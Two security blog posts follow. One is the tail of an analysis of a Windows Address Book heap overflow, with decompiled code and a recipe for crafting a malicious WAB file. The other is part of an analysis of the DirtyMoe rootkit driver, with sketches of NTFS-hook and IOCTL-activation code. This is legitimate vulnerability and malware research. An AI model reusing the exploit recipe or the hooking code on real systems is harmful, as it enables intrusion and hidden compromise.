      unsigned int v27; // [rsp+68h] [rbp+10h]
      unsigned int copy_dword_2; // [rsp+70h] [rbp+18h]

      security_check_result = 0;
      remaining_buffer_bytes = buffer_length;
      l_header_dword_3 = header_dword_3;
      ptr_to_buffer = buffer_ptr;
      if ( header_dword_3 )                      
      {
        while ( remaining_buffer_bytes > 4 )        
        {

[4]

          if ( *(_DWORD *)ptr_to_buffer & 0x1000 )  
          {

[5]

            current_property_tag = *(unsigned __int16 *)ptr_to_buffer;
            if ( current_property_tag == 0x1102 ||                    
                 (unsigned int)(current_property_tag - 0x101E) <= 1 ) 
            {                         

[6]
                                      
              ptr_to_dword_1 = ptr_to_buffer + 4;                     
              ptr_to_dword_0 = ptr_to_buffer;
              if ( remaining_buffer_bytes < 0xC )                     
                return security_check_result;                         
              dword_2 = *((_DWORD *)ptr_to_buffer + 2);
              v22 = remaining_buffer_bytes - 0xC;
              if ( dword_2 > v22 )                                     
                return security_check_result;                         
              ptr_to_buffer += 12;
              copy_dword_2 = dword_2;
              remaining_buffer_bytes = v22 - dword_2;
              c_ptr_to_property_value = ptr_to_buffer;                
              v23 = 0;                                                
              if ( *ptr_to_dword_1 > 0u )
              {
                while ( (unsigned int)SecurityCheckSingleValue(
                                        *(_DWORD *)ptr_to_dword_0,
                                        &c_ptr_to_property_value,
                                        &copy_dword_2) )
                {
                  if ( (unsigned int)++v23 >= *ptr_to_dword_1 )       
                  {                                                   
                    ptr_to_buffer = c_ptr_to_property_value;
                    goto LABEL_33;
                  }
                }
                return security_check_result;
              }
            }
            else                                                         
            {
             
[7]

              if ( remaining_buffer_bytes < 0xC )
                return security_check_result;
              c_dword_2 = *((unsigned int *)ptr_to_buffer + 2);       
              v9 = remaining_buffer_bytes - 12;
              if ( (unsigned int)c_dword_2 > v9 )                     
                return security_check_result;                         
              remaining_buffer_bytes = v9 - c_dword_2;
              VA = current_property_tag - 0x1002;                     
              if ( VA )
              {
                VB = VA - 1;
                if ( VB && (VC = VB - 1) != 0 )
                {
                  VD = VC - 1;
                  if ( VD && (VE = VD - 1) != 0 && (VF = VE - 1) != 0 && (VG = VF - 13) != 0 && (VH = VG - 44) != 0 )
                    res = VH == 8 ? 16i64 : 0i64;
                  else
                    res = 8i64;
                }
                else
                {
                  res = 4i64;
                }
              }
              else
              {
                res = 2i64;
              }
              if ( (unsigned int)c_dword_2 / *((_DWORD *)ptr_to_buffer + 1) != res ) 
                return security_check_result;                                        
                                                                                     

              ptr_to_buffer += c_dword_2 + 12;
            }
          }
          else                                     
          {                                        

[8]

            if ( remaining_buffer_bytes < 4 )       
              return security_check_result;
            v24 = *(_DWORD *)ptr_to_buffer;         
            c_ptr_to_property_value = ptr_to_buffer + 4;// new exe: v13 = buffer_ptr + 4;
            v27 = remaining_buffer_bytes - 4;       
            if ( !(unsigned int)SecurityCheckSingleValue(v24, &c_ptr_to_property_value, &v27) )
              return security_check_result;
            remaining_buffer_bytes = v27;
            ptr_to_buffer = c_ptr_to_property_value;
          }
    LABEL_33:
          if ( !--l_header_dword_3 )
            break;
        }
      }
      if ( !l_header_dword_3 )
        security_check_result = 1;
      return security_check_result;
    }

At [4] the tag of the property being processed is checked. The checks performed depend on whether the property processed in each iteration is a simple or a composite property. For simple properties (i.e, properties with tag lower than 0x1000), execution continues at [8]. The following checks are done for simple properties:

  1. If the remaining number of bytes in the buffer is fewer than 4, the function returns with an error.
  2. A pointer to the property value is obtained and SecurityCheckSingleValue() is called to perform a security check upon the simple property and its value. SecurityCheckSingleValue() performs a security check and increments the pointer to point at the next property in the buffer, so that SecurityCheckPropArrayBuffer() can check the next property on the next iteration.
  3. The number of total properties is decremented and compared to zero. If equal to zero, then the function returns successfully. If different, the next iteration of the loop checks the next property.

Similarly, for composite properties (i.e, properties with tag equal or higher than 0x1000) execution continues at [5] and the following is done.

For variable-length composite properties (if the property tag is equal to 0x1102 (PtypMultipleBinary), 0x101E (PtypMultipleString8), or 0x101F (PtypMultipleString)), the code at [6] does the following:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size field of the property is compared to the remaining buffer length to avoid overrunning the buffer.
  3. For each nested property, the function SecurityCheckSingleValue() is called. It:
    1. Performs a security check on the nested property.
    2. Advances the pointer to the buffer held by the caller, in order to point to the next nested property.
  4. The loop runs until the number of total properties in the contact (decremented in each iteration) is zero.

For fixed-length composite properties (if the property tag in question is different from 0x1102 (PtypMultipleBinary), 0x101E (PtypMultipleString8), and 0x101F (PtypMultipleString)), the following happens starting at [7]:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size is compared to the remaining buffer length to avoid overrunning the buffer.
  3. The size of each nested property, which depends only on the property tag, is calculated from the parent property tag.
  4. The Size is divided by NestedPropCount to obtain the size of each nested property.
  5. The function returns with an error if the calculated subproperty size is different from the property size deduced from parent property tag.
  6. The buffer pointer is incremented by the size of the parent property value to point to the next property.

Unknown or non-processable property types are assigned the nested property size 0x0.

It was observed that if the calculated nested-property size is zero, the buffer pointer is still advanced by the size of the property value as described by the header. By skipping over the value this way, the security check leaves the contents of the parent property (which may include subproperties) unchecked. For the security check to pass, the division performed in step 4 for fixed-length composite properties must yield zero, which for an unknown or non-processable property means that NestedPropCount must be larger than Size (for example, Size = 2 with NestedPropCount = 5 gives 2 / 5 = 0 in integer division). Note that since any nested property is at least two bytes long, NestedPropCount can never exceed half of Size in a well-formed property, so this division is never zero in benign cases.

After the checks have concluded, the function returns zero for a failed check and one for a passed check.

Subsequently, the function HrGetPropArrayFromFileRecord() calls HrGetPropArrayFromBuffer(), which aims to collect the properties into an array of _SPropValue structs and return it to the caller. The _SPropValue array has a length equal to the number of properties (as given by the contact header) and is allocated on the heap through a call to LocalAlloc(). The number of properties is multiplied by sizeof(_SPropValue) to yield the total buffer size. The following fragment shows the allocation taking place:

    if ( !property_array_r )
    {
        ret = -2147024809;
        goto LABEL_71;
    }
    *property_array_r = 0i64;
    header_dword_3_1 = set_to_zero + header_dword_3;

[9]

    if ( (unsigned int)header_dword_3_1 < header_dword_3       
      || (unsigned int)header_dword_3_1 > 0xAAAAAAA            
      || (v10 = (unsigned int)header_dword_3_1,                               
          property_array = (struct _SPropValue *)LocalAlloc(
                                                   0x40u,
                                                   0x18 * header_dword_3_1),
                                                   // sizeof(_SPropValue) * n_properties_in_binary
        (*property_array_r = property_array) == 0i64) )
    {
        ERROR_INSUFICIENT_MEMORY:
        ret = 0x8007000E;
        goto LABEL_71;
    }

An allocation of sizeof(_SPropValue) * n_properties_in_binary can be observed at [9]. Immediately after, each of the property structures is initialized and its property tag member is set to 1. After initialization, the buffer, on which security checks have already been performed, is processed property by property, advancing a pointer to the next property using the header and value sizes provided by the property in question.

If the property processed by the specific loop iteration is a simple property, the following code is executed:

    if ( !_bittest((const signed int *)&current_property_tag, 0xCu) )
    {
      if ( v16 < 4 )
        break;
      dword_1 = wab_ulong_buffer_full[1];
      ptr_to_dword_2 = (char *)(wab_ulong_buffer_full + 2);
      v38 = v16 - 4;
      if ( (unsigned int)dword_1 > v38 )
        break;
      current_property_tag = (unsigned __int16)current_property_tag;
      if ( (unsigned __int16)current_property_tag > 0xBu )
      {

[10]

        v39 = current_property_tag - 0x1E;
        if ( !v39 )
          goto LABEL_79;
        v40 = v39 - 1;
        if ( !v40 )
          goto LABEL_79;
        v41 = v40 - 0x21;
        if ( !v41 )
          goto LABEL_56;
        v42 = v41 - 8;
        if ( v42 )
        {
          if ( v42 != 0xBA )
            goto LABEL_56;
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_1);
          if ( !(*property_array_r)[p_idx].Value.bin.lpb )
            goto ERROR_INSUFICIENT_MEMORY;
          (*property_array_r)[p_idx].Value.l = dword_1;
          v44 = *(&(*property_array_r)[p_idx].Value.at + 1);
        }
        else
        {
    LABEL_79:

[11]
                                           
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.cur.int64 = (LONGLONG)LocalAlloc(0x40u, dword_1);
          v44 = (*property_array_r)[p_idx].Value.dbl;
          if ( v44 == 0.0 )
            goto ERROR_INSUFICIENT_MEMORY;
        }
        memcpy_0(*(void **)&v44, ptr_to_dword_2, v43);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[v43];
      }
      else
      {
    LABEL_56:               

[12]
           
        memcpy_0(&(*property_array_r)[v15].Value, ptr_to_dword_2, dword_1);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[dword_1];
      }
      remaining_bytes_to_process = v38 - dword_1;
      goto NEXT_PROPERTY;
    }

[Truncated]

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
          return 0;
      }

At [10] the property tag is extracted and compared with several constants. If the property tag is 0x1e (PtypString8), 0x1f (PtypString), or 0x48 (PtypGuid), then execution continues at [11]. If the property tag is 0x40 (PtypTime) or is not recognized, execution continues at [12]. The memcpy call at [12] is prone to a heap overflow.

Conversely, if the property being processed in the specific loop iteration is not a simple property, the following code is executed. Notably, at this point the pointer DWORD* wab_ulong_buffer_full points to the property tag of the property being processed. Regardless of which composite property is being processed, before the property tag is identified the buffer is advanced to point to the beginning of the property value, which starts at the 4th 32-bit integer.

[13]

    if ( v16 < 4 )
    break;
    c_dword_1 = wab_ulong_buffer_full[1];
    v19 = v16 - 4;
    if ( v19 < 4 )
    break;
    dword_2 = wab_ulong_buffer_full[2];
    wab_ulong_buffer_full += 3;                     

    remaining_bytes_to_process = v19 - 4;

[14]

    if ( (unsigned __int16)current_property_tag >= 0x1002u )
    {
    if ( (unsigned __int16)current_property_tag <= 0x1007u || (unsigned __int16)current_property_tag == 0x1014 )
        goto LABEL_80;
    if ( (unsigned __int16)current_property_tag == 0x101E )
    {
        [Truncated]
        
    }
    if ( (unsigned __int16)current_property_tag == 0x101F )
    {
        [Truncated]        
    }
    if ( ((unsigned __int16)current_property_tag - 0x1040) & 0xFFFFFFF7 )
    {
        if ( (unsigned __int16)current_property_tag == 0x1102 )
        {
        [Truncated]
        }
    }
    else
    {
    LABEL_80:

[15]

        (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_2);
        if ( !(*property_array_r)[p_idx].Value.bin.lpb )
        goto ERROR_INSUFICIENT_MEMORY;
        (*property_array_r)[p_idx].Value.l = c_dword_1;
        if ( (unsigned int)dword_2 > remaining_bytes_to_process )
        break;
        memcpy_0((*property_array_r)[p_idx].Value.bin.lpb, wab_ulong_buffer_full, dword_2);
        wab_ulong_buffer_full = (ULONG *)((char *)wab_ulong_buffer_full + dword_2);
        remaining_bytes_to_process -= dword_2;
    }
    }

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
        return 0;
    }

After the buffer has been advanced at [13], the property tag is compared with several constants starting at [14]. Finally, the code fragment at [15] attempts to process a composite property (i.e. >= 0x1000) with a tag not contemplated by the previous constants.

Although the processing logic of each type of property is irrelevant here, an interesting fact is that if the property tag is not recognized, the buffer pointer has still been advanced to the end of its header, and it is never retracted. This happens if all of the following conditions are met:

  • The property tag is larger or equal than 0x1002.
  • The property tag is larger than 0x1007.
  • The property tag is different from 0x1014.
  • The property tag is different from 0x101e.
  • The property tag is different from 0x101f.
  • The property tag is different from 0x1102.
  • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is nonzero.

Interestingly, if all of the above conditions are met, the property header of the composite property is skipped, and the next loop iteration will interpret its property body as a different property.

Therefore, it is possible to overflow the _SPropValue array allocated in the heap by HrGetPropArrayFromBuffer() by using the following observations:

  • A specially crafted composite unknown or non-processable property can be made to bypass security checks if NestedPropCount is larger than Size.
  • HrGetPropArrayFromBuffer() can be made to interpret the Value of a specially crafted property as a separate property.

Proof-of-Concept

In order to create a malicious WAB file from a benign WAB file, export a valid WAB file from an instance of the Windows Address Book. It is noted that Outlook Express on Windows XP includes the ability to export contacts as a WAB file.

The benign WAB file can be modified to make it malicious by altering a contact inside it to have the following characteristics:

  • A nested (composite) property containing the following:
    • A tag of an unknown or unprocessable type, for example the tag 0x1058, satisfying the following conditions:
      • Must be larger than or equal to 0x1002.
      • Must be larger than 0x1007.
      • Must be different from 0x1014, 0x101e, 0x101f, and 0x1102.
      • The result of subtracting 0x1040 from the property tag and performing a bitwise AND of the result with 0xFFFFFFF7 must be non-zero.
      • Must be different from 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1014, 0x1040, and 0x1048.
    • A NestedPropCount larger than Size.
    • An empty Value.
  • A malicious simple property containing the following:
    • A property tag different from 0x1e, 0x1f, 0x40 and 0x48, for example the tag 0x0.
    • A Size value larger than 0x18 × NestedPropCount in order to overflow the _SPropValue array buffer.
    • An unspecified number of trailing bytes that will overflow the _SPropValue array buffer.

Finally, when an attacker tricks an unsuspecting user into importing the specially crafted WAB file, the vulnerability is triggered and code execution could be achieved. Failed exploitation attempts will most likely result in a crash of the Windows Address Book Import Tool.

Due to the presence of ASLR and a lack of a scripting engine, we were unable to obtain arbitrary code execution in Windows 10 from this vulnerability.

Conclusion

Hopefully you enjoyed this dive into CVE-2021-24083, and if you did, go ahead and check out our other blog post on a use-after-free vulnerability in Adobe Acrobat Reader DC. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book appeared first on Exodus Intelligence.

DirtyMoe: Rootkit Driver

Abstract

In the first post, DirtyMoe: Introduction and General Overview of Modularized Malware, we described a complex and sophisticated piece of malware called DirtyMoe. The malware's main observed roles are cryptojacking and DDoS attacks, both of which remain popular. There is no doubt that the malware has been released for profit, and all evidence points to Chinese territory. In most cases, the PurpleFox campaign is used to exploit vulnerable systems: the exploit gains the highest privileges and installs the malware via the MSI installer. In short, the installer misuses the Windows System Event Notification Service (SENS) for the malware deployment. At the end of the deployment, two processes (workers) execute malicious activities received from well-concealed C&C servers.

As we mentioned in the first post, every good malware must implement a set of protection, anti-forensics, anti-tracking, and anti-debugging techniques. One of the most used techniques for hiding malicious activity is the use of rootkits. In general, the main goal of a rootkit is to hide itself and other modules of the hosting malware at the kernel layer. Rootkits are potent tools but carry a high risk of being detected, because they work in kernel-mode, where each critical bug leads to a BSoD.

The primary aim of this next article is to analyze the rootkit techniques that DirtyMoe uses. The main part of this study examines the functionality of the DirtyMoe driver, aiming to provide comprehensive information about the driver in terms of static and dynamic analysis. The key techniques of the DirtyMoe rootkit can be listed as follows: the driver can hide itself and other malware activities in both kernel and user mode. Moreover, the driver can execute commands received from user-mode under kernel privileges. Another significant aspect of the driver is the injection of an arbitrary DLL file into targeted processes. Last but not least is the driver's ability to censor the file system content. We also describe the refined routine that deploys the driver into the kernel and the anti-forensic methods the malware authors used.

Another essential point of this research is the investigation of the driver's metadata, which shows that the driver is code-signed with certificates that were stolen and revoked in the past. However, these certificates are still widespread in the wild and are misused by other malicious software to this day.

Finally, the last part summarises the rootkit functionality and draws together the key findings about the digital certificates, linking DirtyMoe to other malicious software. In addition, we discuss the implementation level and the sources of the rootkit techniques used.

1. Sample

The subject of this research is a sample with SHA-256:
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
The sample is a Windows driver that DirtyMoe drops at system startup.

Note: 44 of 71 AV engines (62%) on VirusTotal detect the sample as malicious. By comparison, the DirtyMoe DLL file is detected by 86% of registered AVs. The detection coverage is nonetheless sufficient, since the driver is dumped from the DLL file.

Basic Information
  • File Type: Portable Executable 64
  • File Info: Microsoft Visual C++ 8.0 (Driver)
  • File Size: 116.04 KB (118824 bytes)
  • Digital Signature: Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Imports

The driver imports two libraries, FltMgr and ntoskrnl. Table 1 summarizes the most suspicious methods from the driver's point of view.

Routine Description
FltSetCallbackDataDirty A minifilter driver’s pre or post operation calls the routine to indicate that it has modified the contents of the callback data structure.
FltGetRequestorProcessId Routine returns the process ID for the process requested for a given I/O operation.
FltRegisterFilter FltRegisterFilter registers a minifilter driver.
ZwDeleteValueKey
ZwSetValueKey
ZwQueryValueKey
ZwOpenKey
Routines delete, set, query, and open registry entries in kernel-mode.
ZwTerminateProcess Routine terminates a process and all of its threads in kernel-mode.
ZwQueryInformationProcess Retrieves information about the specified process.
MmGetSystemRoutineAddress Returns a pointer to a function specified by a routine parameter.
ZwAllocateVirtualMemory Reserves a range of application-accessible virtual addresses in the specified process in kernel-mode.
Table 1. Kernel methods imported by the DirtyMoe driver

At first glance, the driver looks up kernel routines via MmGetSystemRoutineAddress() as a form of obfuscation, since the string table contains routine names operating with virtual memory, e.g., ZwProtectVirtualMemory(), ZwReadVirtualMemory(), ZwWriteVirtualMemory(). The kernel routine ZwQueryInformationProcess() and strings such as services.exe and winlogon.exe point out that the rootkit probably works with kernel structures of the critical Windows processes.
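For context, this is roughly how a driver can resolve an exported kernel routine by name instead of importing it statically. The snippet below is a minimal illustrative sketch (not code recovered from the sample) using ZwQueryInformationProcess(), one of the routines from Table 1 that Microsoft documents as being resolvable via MmGetSystemRoutineAddress():

#include <ntifs.h>

typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(
    HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass,
    PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);

static ZWQUERYINFORMATIONPROCESS ResolveZwQueryInformationProcess(VOID)
{
    UNICODE_STRING name = RTL_CONSTANT_STRING(L"ZwQueryInformationProcess");

    /* The routine is resolved at run time, so no static import is created;
     * the call returns NULL if the routine is not exported on a given build. */
    return (ZWQUERYINFORMATIONPROCESS)MmGetSystemRoutineAddress(&name);
}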

2. DirtyMoe Driver Analysis

The DirtyMoe driver does not execute any specific malware activities itself. However, it provides a wide range of rootkit and backdoor techniques. The driver has been designed as a service support system for the DirtyMoe service in user mode.

The driver can perform actions that would normally require high privileges, such as writing a file into the system folder, writing to the system registry, killing an arbitrary process, etc. The malware in user mode just sends a defined control code and data to the driver, and the driver performs the higher-privilege actions.

Further, the malware can use the driver to hide records that would betray its malicious activities. The driver affects the system registry and can conceal arbitrary keys. Moreover, the system process services.exe is patched in memory, and the driver can exclude arbitrary services from the list of running services. Additionally, the driver modifies the kernel structures recording loaded drivers, so the malware can choose which drivers are visible and which are not. Therefore, the malware is active, but the system and user cannot list the malware records using standard API calls to enumerate the system registry, services, or loaded drivers. The malware can also hide requisite files stored in the file system since the driver implements a minifilter mechanism. Consequently, if a user requests a record from the file system, the driver catches this request and can affect the query result that is passed to the user.

The driver consists of 10 main functionalities as Table 2 illustrates.

Function Description
Driver Entry routine called by the kernel when the driver is loaded.
Start Routine is run as a kernel thread restoring the driver configuration from the system registry.
Device Control processes system-defined I/O control codes (IOCTLs) controlling the driver from the user-mode.
Minifilter Driver routine completes processing for one or more types of I/O operations; QueryDirectory in this case. In other words, the routine filters folder enumerations.
Thread Notification routine registers a driver-supplied callback that is notified when a new thread is created.
Callback of NTFS Driver wraps the original callback of the NTFS driver for IRP_MJ_CREATE major function.
Registry Hiding is a hook method that provides registry key hiding.
Service Hiding is a routine hiding a defined service.
Driver Hiding is a routine hiding a defined driver.
Driver Unload routine is called by the kernel when the driver is unloaded.
Table 2. Main driver functionality

Most of the implemented functionalities are available as public samples on internet forums. The level of programming skills is different for each driver functionality. It seems that the driver author merged the public samples in most cases. Therefore, the driver contains a few bugs and unused code. The driver is still in development, and we will probably find other versions in the wild.

2.1 Driver Entry

The Driver Entry is the first routine that is called by the kernel after the driver is loaded. The driver initializes a large number of global variables for its proper operation. Firstly, the driver detects the OS version and sets up the required offsets for further malicious use. Secondly, a variable pointing to the driver image is initialized. The driver image is used for hiding the driver. The driver also associates the following major functions:

  1. IRP_MJ_CREATE, IRP_MJ_CLOSE – no action of interest,
  2. IRP_MJ_DEVICE_CONTROL – used for driver configuration and control,
  3. IRP_MJ_SHUTDOWN – writes malware-defined data into the disk and registry.

The Driver Entry creates a symbolic link to the driver and tries to associate it with other malicious monitoring or filtering callbacks. The first one is a minifilter activated by the FltRegisterFilter() method registering the FltPostOperation(); it filters access to the system drives and allows the driver to hide files and directories.

Further, the initialization method swaps the IRP_MJ_CREATE major function of the \FileSystem\Ntfs driver. So, each API call of CreateFile() or the kernel-mode function IoCreateFile() can be monitored and affected by the malicious MalNtfsCreatCallback() callback.
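A hedged sketch of this callback-swapping technique is shown below; MalNtfsCreatCallback() is the name used in the article, while ObReferenceObjectByName() is an undocumented (but well-known) kernel export and the rest is purely illustrative:

#include <ntifs.h>

extern POBJECT_TYPE *IoDriverObjectType;    /* exported by ntoskrnl, declared here for the sketch */

NTSTATUS NTAPI ObReferenceObjectByName(     /* undocumented ntoskrnl export */
    PUNICODE_STRING ObjectName, ULONG Attributes, PACCESS_STATE AccessState,
    ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode,
    PVOID ParseContext, PVOID *Object);

static PDRIVER_DISPATCH g_OriginalNtfsCreate;

static NTSTATUS MalNtfsCreatCallback(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    /* The access decision (whitelists/blacklist) would go here;
     * this sketch simply forwards everything to the original callback. */
    return g_OriginalNtfsCreate(DeviceObject, Irp);
}

static NTSTATUS HookNtfsCreate(VOID)
{
    UNICODE_STRING ntfsName = RTL_CONSTANT_STRING(L"\\FileSystem\\Ntfs");
    PDRIVER_OBJECT ntfs;
    NTSTATUS status = ObReferenceObjectByName(&ntfsName, OBJ_CASE_INSENSITIVE, NULL, 0,
                                              *IoDriverObjectType, KernelMode, NULL,
                                              (PVOID *)&ntfs);
    if (!NT_SUCCESS(status))
        return status;

    /* Swap the IRP_MJ_CREATE dispatch routine for the malicious callback. */
    g_OriginalNtfsCreate = (PDRIVER_DISPATCH)InterlockedExchangePointer(
        (PVOID *)&ntfs->MajorFunction[IRP_MJ_CREATE], (PVOID)MalNtfsCreatCallback);

    ObDereferenceObject(ntfs);
    return STATUS_SUCCESS;
}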

Another Driver Entry method sets a callback using PsSetCreateThreadNotifyRoutine(). The NotifyRoutine() monitors thread creation in the kernel, and the malware can inject malicious code into newly created processes/threads.

Finally, the driver tries to restore its configuration from the system registry.

2.2 Start Routine

The Start Routine is run as a kernel system thread created in the Driver Entry routine. The Start Routine writes the driver version into the SYSTEM registry as follows:

  • Key: HKLM\SYSTEM\CurrentControlSet\Control\WinApi\WinDeviceVer
  • Value: 20161122

If the following SOFTWARE registry key is present, the driver loads artifacts needed for the process injecting:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Secure

The last part of Start Routine loads the rest of the necessary entries from the registry. The complete list of the system registry is documented in Appendix A.

2.3 Device Control

The device control is a mechanism for controlling a loaded driver. A driver receives an IRP_MJ_DEVICE_CONTROL request carrying an I/O control code (IOCTL) if a user-mode thread calls the Win32 API DeviceIoControl(); visit [1] for more information. The user-mode application sends the request directly to a specific device driver. The driver then performs the corresponding operation. Therefore, malicious user-mode applications can control the driver via this mechanism.

The driver supports approx. 60 control codes. We divided the control codes into 3 basic groups: controlling, inserting, and setting.

Controlling

There are 9 main control codes invoking driver functionality from the user-mode. The following Table 3 summarizes controlling IOCTL that can be sent by malware using the Win32 API.

IOCTL Description
0x222C80 The driver accepts other IOCTLs only if the driver is activated. Malware in the user-mode can activate the driver by sending this IOCTL and authorization code equal 0xB6C7C230.
0x2224C0  The malware sends data which the driver writes to the system registry. A key, value, and data type are set by Setting control codes.
used variable: regKey, regValue, regData, regType
0x222960 This IOCTL clears all data stored by the driver.
used variable: see Setting and Inserting variables
0x2227EC If the malware needs to hide a specific driver, the driver adds the driver name to the listBaseDllName and hides it using Driver Hiding.
0x2227E8 The driver adds the name of the registry key to the WinDeviceAddress list and hides this key using Registry Hiding.
used variable: WinDeviceAddress
0x2227F0 The driver hides a given service defined by the name of the DLL image. The name is inserted into the listServices variable, and the Service Hiding technique hides the service in the system.
0x2227DC If the malware wants to deactivate the Registry Hiding, the driver restores the original kernel GetCellRoutine().
0x222004 The malware sends the ID of a process it wants to terminate. The driver calls the kernel function ZwTerminateProcess() and terminates the process and all of its threads regardless of the malware's privileges.
0x2224C8 The malware sends data which the driver writes to the file defined by the filePath variable; see Setting control codes.
used variable: filePath, fileData
Table 3. Controlling IOCTLs
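To make the control flow concrete, the fragment below sketches how a user-mode component could send the activation IOCTL from Table 3. The device name is hypothetical (the article does not state the driver's symbolic link), and the input-buffer layout (a single DWORD carrying the authorization code) is an assumption:

#include <windows.h>
#include <stdio.h>

#define IOCTL_ACTIVATE   0x222C80      /* activation IOCTL from Table 3 */
#define ACTIVATION_CODE  0xB6C7C230    /* authorization code from Table 3 */

int main(void)
{
    /* Hypothetical device name; the real symbolic link is not documented here. */
    HANDLE dev = CreateFileW(L"\\\\.\\HypotheticalDirtyMoeDevice",
                             GENERIC_READ | GENERIC_WRITE, 0, NULL,
                             OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE)
        return 1;

    DWORD auth = ACTIVATION_CODE, bytes = 0;
    BOOL ok = DeviceIoControl(dev, IOCTL_ACTIVATE, &auth, sizeof(auth),
                              NULL, 0, &bytes, NULL);
    printf("activation %s\n", ok ? "sent" : "failed");

    CloseHandle(dev);
    return 0;
}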
Inserting

There are 11 control codes inserting items into white/blacklists. The following Table 4 summarizes variables and their purpose.

White/Black list Variable Purpose
Registry HIVE WinDeviceAddress Defines a list of registry entries that the malware wants to hide in the system.
Process Image File Name WinDeviceMaker Represents a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems. Further, it operates in Minifilter Driver and prevents hiding files defined in the WinDeviceNumber variable. The last use is in Registry Hiding; the malware does not hide registry keys for the whitelisted processes.
WinDeviceMakerB Defines a whitelist of processes defined by process image file name. It is used in Callback of NTFS Driver, and grants access to the NTFS file systems.
WinDeviceMakerOnly Specifies a blacklist of processes defined by the process image file name. It is used in Callback of NTFS Driver and refuses access to the NTFS file systems.
File names (full path) WinDeviceName, WinDeviceNameB Determines a whitelist of files that should be granted access by Callback of NTFS Driver. It is used in combination with WinDeviceMaker and WinDeviceMakerB. So, if a file is on the whitelist and a requesting process is also whitelisted, the driver grants access to the file.
WinDeviceNameOnly Defines a blacklist of files that should be denied access by Callback of NTFS Driver. It is used in combination with WinDeviceMakerOnly. So, if a file is on the blacklist and a requesting process is also blacklisted, the driver refuses access to the file.
File names (containing number) WinDeviceNumber Defines a list of files that should be hidden in the system by Minifilter Driver. The malware uses a name convention as follows: [A-Z][a-z][0-9]+\.[a-z]{3}. So, a file name includes a number.
Process ID ListProcessId1 Defines a list of processes requiring access to NTFS file systems. The malware does not restrict the access for these processes; see Callback of NTFS Driver.
ListProcessId2 The same purpose as ListProcessId1. Additionally, it is used as the whitelist for the registry hiding, so the driver does not restrict access. The Minifilter Driver does not limit processes in this list.
Driver names listBaseDllName Defines a list of drivers that should be hidden in the system; see Driver Hiding.
Service names listServices Specifies a list of services that should be hidden in the system; see Service Hiding.
Table 4. White and Black lists
Setting

The setting control codes store scalar values in global variables. The following Table 5 summarizes and groups these variables and their purpose.

Function Variable Description
File Writing
(Shutdown)
filename1_for_ShutDown
data1_for_ShutDown
Defines a file name and data for the first file written during the driver shutdown.
filename2_for_ShutDown
data2_for_ShutDown
Defines a file name and data for the second file written during the driver shutdown.
Registry Writing
(Shutdown)
regKey1_shutdown
regValue1_shutdown
regData1_shutdown
regType1
Specifies the first registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
regKey2_shutdown
regValue2_shutdown
regData2_shutdown
regType2
Specifies the second registry key path, value name, data, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.) written during the driver shutdown.
File Data Writing filePath Determines filename which will be used to write data;
see Controlling IOCTL 0x2224C8.
Registry Writing regKey
regValue
regType
Specifies registry key path, value name, and type (REG_BINARY, REG_DWORD, REG_SZ, etc.);
see Controlling IOCTL 0x2224C0.
Unknown
(unused)
dwWinDevicePathA
dwWinDeviceDataA
Keeps a path and data for file A.
dwWinDevicePathB
dwWinDeviceDataB
Keeps a path and data for file B.
Table 5. Global driver variables

The following Table 6 summarizes variables used for the process injection; see Thread Notification.

Function Variable Description
Process to Inject dwWinDriverMaker2
dwWinDriverMaker2_2
Defines two command-line arguments. If a process with one of the arguments is created, the driver should inject the process.
dwWinDriverMaker1
dwWinDriverMaker1_2
Defines two process names that should be injected if the process is created.
DLL to Inject dwWinDriverPath1
dwWinDriverDataA
Specifies a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath1_2
dwWinDriverDataA_2
Defines a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
dwWinDriverPath2
dwWinDriverDataB
Keeps a file name and data for the process injection defined by dwWinDriverMaker2 or dwWinDriverMaker1.
dwWinDriverPath2_2
dwWinDriverDataB_2
Specifies a file name and data for the process injection defined by dwWinDriverMaker2_2 or dwWinDriverMaker1_2.
Table 6. Injection variables

2.4 Minifilter Driver

The minifilter driver is registered in the Driver Entry routine using the FltRegisterFilter() method. One of the method arguments defines the configuration (FLT_REGISTRATION) and callback methods (FLT_OPERATION_REGISTRATION). If a QueryDirectory system request is invoked, the malware driver catches the request and processes it with its FltPostOperation().
